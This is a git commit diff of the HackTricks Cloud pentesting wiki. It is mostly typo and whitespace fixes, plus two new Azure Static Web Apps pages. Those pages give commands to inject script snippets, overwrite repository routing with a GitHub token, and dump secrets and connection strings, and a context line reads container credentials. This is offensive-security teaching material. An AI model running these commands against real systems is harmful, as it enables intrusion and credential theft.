mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-28 13:43:24 -08:00
MIGRATION TYPOS
This commit is contained in:
Carlos Polop
@@ -118,7 +118,7 @@ Users can have **MFA enabled to login** through the console. API tokens of MFA e
|
||||
- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
|
||||
|
||||
Whenever you need to **change the Access Key** this is the process you should follow:\
|
||||
&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
|
||||
_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
|
||||
|
||||
### MFA - Multi Factor Authentication
|
||||
|
||||
|
||||
@@ -18,8 +18,8 @@ Temporary tokens cannot be listed, so maintaining an active temporary token is a
|
||||
|
||||
# With MFA
|
||||
aws sts get-session-token \
|
||||
--serial-number <mfa-device-name> \
|
||||
--token-code <code-from-token>
|
||||
--serial-number <mfa-device-name> \
|
||||
--token-code <code-from-token>
|
||||
|
||||
# Hardware device name is usually the number from the back of the device, such as GAHT12345678
|
||||
<strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
|
||||
|
||||
@@ -105,7 +105,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
|
||||
### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
|
||||
|
||||
An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
|
||||
&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
|
||||
_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
|
||||
|
||||
## References
|
||||
|
||||
|
||||
@@ -168,21 +168,21 @@ For this you might need to have access to the **identity provider**. If that is
|
||||
Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
|
||||
|
||||
<pre class="language-bash"><code class="lang-bash">aws cognito-identity get-id \
|
||||
--identity-pool-id <identity_pool_id> \
|
||||
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
--identity-pool-id <identity_pool_id> \
|
||||
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
|
||||
# Get the identity_id from the previous commnad response
|
||||
aws cognito-identity get-credentials-for-identity \
|
||||
--identity-id <identity_id> \
|
||||
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
--identity-id <identity_id> \
|
||||
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
|
||||
|
||||
# In the IdToken you can find roles a user has access because of User Pool Groups
|
||||
# User the --custom-role-arn to get credentials to a specific role
|
||||
aws cognito-identity get-credentials-for-identity \
|
||||
--identity-id <identity_id> \
|
||||
<strong> --custom-role-arn <role_arn> \
|
||||
</strong> --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
--identity-id <identity_id> \
|
||||
<strong> --custom-role-arn <role_arn> \
|
||||
</strong> --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
|
||||
</code></pre>
|
||||
|
||||
> [!WARNING]
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
|
||||
**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
|
||||
|
||||
There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." 
|
||||
There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."
|
||||
|
||||
### Types of Schedules
|
||||
|
||||
|
||||
@@ -32,7 +32,7 @@
|
||||
|
||||
All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
|
||||
|
||||
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
|
||||
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
|
||||
|
||||
### Azure Resource IDs
|
||||
|
||||
@@ -148,7 +148,7 @@ An **App Registration** is a configuration that allows an application to integra
|
||||
|
||||
1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
|
||||
2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
|
||||
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). 
|
||||
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).
|
||||
1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
|
||||
4. **API Permissions:** Specifies what resources or APIs the app can access.
|
||||
5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
|
||||
@@ -176,7 +176,7 @@ An **App Registration** is a configuration that allows an application to integra
|
||||
|
||||
- Users can request admin consent to apps they are unable to consent to
|
||||
- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
|
||||
- Configure also if users will receive email notifications and expiration reminders 
|
||||
- Configure also if users will receive email notifications and expiration reminders
|
||||
|
||||
### **Managed Identity (Metadata)**
|
||||
|
||||
|
||||
@@ -14,15 +14,15 @@ There are different ways a machine can be connected to the cloud:
|
||||
|
||||
#### Workplace joined
|
||||
|
||||
<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large</a></p></figcaption></figure>
|
||||
<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large</a></p></figcaption></figure>
|
||||
|
||||
#### Hybrid joined
|
||||
|
||||
<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large</a></p></figcaption></figure>
|
||||
<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large</a></p></figcaption></figure>
|
||||
|
||||
#### Workplace joined on AADJ or Hybrid
|
||||
|
||||
<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large</a></p></figcaption></figure>
|
||||
<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large</a></p></figcaption></figure>
|
||||
|
||||
### Tokens and limitations <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
|
||||
|
||||
|
||||
@@ -0,0 +1,71 @@
|
||||
# Az - Static Web Apps Post Exploitation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Azure Static Web Apps
|
||||
|
||||
For more information about this service check:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-static-web-apps.md
|
||||
{{#endref}}
|
||||
|
||||
### Microsoft.Web/staticSites/snippets/write
|
||||
|
||||
It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).
|
||||
|
||||
The fllowing command create an snippet that will always be loaded by the web app::
|
||||
|
||||
```bash
|
||||
az rest \
|
||||
--method PUT \
|
||||
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
|
||||
--headers "Content-Type=application/json" \
|
||||
--body '{
|
||||
"properties": {
|
||||
"name": "supersnippet",
|
||||
"location": "Body",
|
||||
"applicableEnvironmentsMode": "AllEnvironments",
|
||||
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
|
||||
"environments": [],
|
||||
"insertBottom": false
|
||||
}
|
||||
}'
|
||||
```
|
||||
|
||||
### Overwrite file - Overwrite routes, HTML, JS...
|
||||
|
||||
It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message.
|
||||
|
||||
This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by oevrwritting the `staticwebapp.config.json` file.
|
||||
|
||||
> [!WARNING]
|
||||
> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github.
|
||||
|
||||
```bash
|
||||
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"commit": {
|
||||
"message": "Update static web app route configuration",
|
||||
"branchName": "main",
|
||||
"committer": {
|
||||
"name": "Azure App Service",
|
||||
"email": "donotreply@microsoft.com"
|
||||
},
|
||||
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
|
||||
"filePath": "staticwebapp.config.json",
|
||||
"message": "Update static web app route configuration",
|
||||
"repoName": "carlospolop/my-first-static-web-app",
|
||||
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
|
||||
},
|
||||
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
|
||||
}'
|
||||
```
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -20,7 +20,7 @@ Once you find where the code of the function is located if you have write permis
|
||||
|
||||
The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
|
||||
|
||||
This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from 
|
||||
This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from
|
||||
|
||||
```bash
|
||||
az functionapp config appsettings list \
|
||||
@@ -211,7 +211,7 @@ az rest --method POST \
|
||||
|
||||
### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
|
||||
|
||||
These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located. 
|
||||
These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located.
|
||||
|
||||
It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application:
|
||||
|
||||
|
||||
@@ -991,7 +991,7 @@ When PIM is enabled it's possible to configure each role with certain requiremen
|
||||
- Require justification on activation
|
||||
- Require ticket information on activation
|
||||
- Require approval to activate
|
||||
- Max time to expire the elegible assignments 
|
||||
- Max time to expire the elegible assignments
|
||||
- A lot more configuration on when and who to send notifications when certain actions happen with that role
|
||||
|
||||
### Conditional Access Policies <a href="#title-text" id="title-text"></a>
|
||||
|
||||
@@ -0,0 +1,59 @@
|
||||
|
||||
# Az - Static Web Apps
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Static Web Apps Basic Information
|
||||
|
||||
|
||||
- **Routes**: It's possible to change the routes of a static webapp by modifying the `staticwebapp.config.json` file. This file is located in the root of the repository and **contains the routes that the app will use**.
|
||||
|
||||
## Enumeration
|
||||
|
||||
```bash
|
||||
# List Static Webapps
|
||||
az staticwebapp list --output table
|
||||
|
||||
# Get Static Webapp details
|
||||
az staticwebapp show --name <name> --resource-group <res-group> --output table
|
||||
|
||||
# Get appsettings
|
||||
az staticwebapp appsettings list --name <name>
|
||||
|
||||
# Get env information
|
||||
az staticwebapp environment list --name <name>
|
||||
az staticwebapp environment functions --name <name>
|
||||
|
||||
# Get API key
|
||||
az staticwebapp secrets list --name <name>
|
||||
|
||||
# Get invited users
|
||||
az staticwebapp users list --name <name>
|
||||
|
||||
# Get database connections
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections?api-version=2021-03-01"
|
||||
|
||||
## Once you have the database connection name ("default" by default) you can get the connection string with the credentials
|
||||
az rest --method POST \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections/default/show?api-version=2021-03-01"
|
||||
```
|
||||
|
||||
## Examples to generate Web Apps
|
||||
|
||||
|
||||
## Post Exploitation
|
||||
|
||||
{{#ref}}
|
||||
../az-privilege-escalation/az-static-web-apps-post-exploitation.md
|
||||
{{#endref}}
|
||||
|
||||
## References
|
||||
|
||||
- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
|
||||
- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -53,7 +53,7 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide
|
||||
|
||||
### Storage endpoints
|
||||
|
||||
<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://<storage-account>.blob.core.windows.net</code><br><br><code>https://<stg-acc>.blob.core.windows.net/<container-name>?restype=container&comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://<storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://<storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://<storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://<storage-account>.table.core.windows.net</code></td></tr></tbody></table>
|
||||
<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://<storage-account>.blob.core.windows.net</code><br><br><code>https://<stg-acc>.blob.core.windows.net/<container-name>?restype=container&comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://<storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://<storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://<storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://<storage-account>.table.core.windows.net</code></td></tr></tbody></table>
|
||||
|
||||
### Public Exposure
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition 
|
||||
## Definition
|
||||
|
||||
Kyverno is an open-source, policy management framework for Kubernetes that enables organizations to define, enforce, and audit policies across their entire Kubernetes infrastructure. It provides a scalable, extensible, and highly customizable solution for managing the security, compliance, and governance of Kubernetes clusters.
|
||||
|
||||
|
||||
@@ -25,15 +25,15 @@ For each ClusterPolicy and Policy, you can specify a list of excluded entities,
|
||||
|
||||
These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them.
|
||||
|
||||
## Example 
|
||||
## Example
|
||||
|
||||
Let's dig into one clusterpolicy example : 
|
||||
Let's dig into one clusterpolicy example :
|
||||
|
||||
```
|
||||
$ kubectl get clusterpolicies MYPOLICY -o yaml
|
||||
```
|
||||
|
||||
Look for the excluded entities : 
|
||||
Look for the excluded entities :
|
||||
|
||||
```yaml
|
||||
exclude:
|
||||
@@ -53,7 +53,7 @@ Within a cluster, numerous added components, operators, and applications may nec
|
||||
|
||||
## Abusing ValidatingWebhookConfiguration
|
||||
|
||||
Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource : 
|
||||
Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource :
|
||||
|
||||
{{#ref}}
|
||||
../kubernetes-validatingwebhookconfiguration.md
|
||||
|
||||
@@ -51,7 +51,7 @@ With a comprehensive overview of the Gatekeeper configuration, it's possible to
|
||||
|
||||
## Abusing ValidatingWebhookConfiguration
|
||||
|
||||
Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource : 
|
||||
Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource :
|
||||
|
||||
{{#ref}}
|
||||
../kubernetes-validatingwebhookconfiguration.md
|
||||
|
||||
@@ -37,7 +37,7 @@ webhook:
|
||||
- pods
|
||||
```
|
||||
|
||||
The main difference between a ValidatingWebhookConfiguration and policies : 
|
||||
The main difference between a ValidatingWebhookConfiguration and policies :
|
||||
|
||||
<figure><img src="../../images/Kyverno.png" alt=""><figcaption><p>Kyverno.png</p></figcaption></figure>
|
||||
|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
### What is tekton
|
||||
|
||||
According to the doc: _Tekton is a powerful and flexible open-source framework for creating CI/CD systems, allowing developers to build, test, and deploy across cloud providers and on-premise systems._ Both Jenkins and Tekton can be used to test, build and deploy applications, however Tekton is Cloud Native. 
|
||||
According to the doc: _Tekton is a powerful and flexible open-source framework for creating CI/CD systems, allowing developers to build, test, and deploy across cloud providers and on-premise systems._ Both Jenkins and Tekton can be used to test, build and deploy applications, however Tekton is Cloud Native.
|
||||
|
||||
With Tekton everything is represented by YAML files. Developers can create Custom Resources (CR) of type `Pipelines` and specify multiple `Tasks` in them that they want to run. To run a Pipeline resources of type `PipelineRun` must be created.
|
||||
|
||||
@@ -57,7 +57,7 @@ Tekton documents about how to restrict the override of scc by adding a label in
|
||||
https://tekton.dev/docs/operator/sccconfig/
|
||||
{{#endref}}
|
||||
|
||||
This label is called `max-allowed` 
|
||||
This label is called `max-allowed`
|
||||
|
||||
```yaml
|
||||
apiVersion: operator.tekton.dev/v1alpha1
|
||||
|
||||
@@ -617,7 +617,7 @@ Some examples using some of those scopes:
|
||||
|
||||
<details>
|
||||
|
||||
<summary>https://www.googleapis.com/auth/userinfo.email & https://www.googleapis.com/auth/userinfo.profile</summary>
|
||||
<summary>https://www.googleapis.com/auth/userinfo.email & https://www.googleapis.com/auth/userinfo.profile</summary>
|
||||
|
||||
```bash
|
||||
curl -X GET \
|
||||
|
||||
Reference in New Issue
Block a user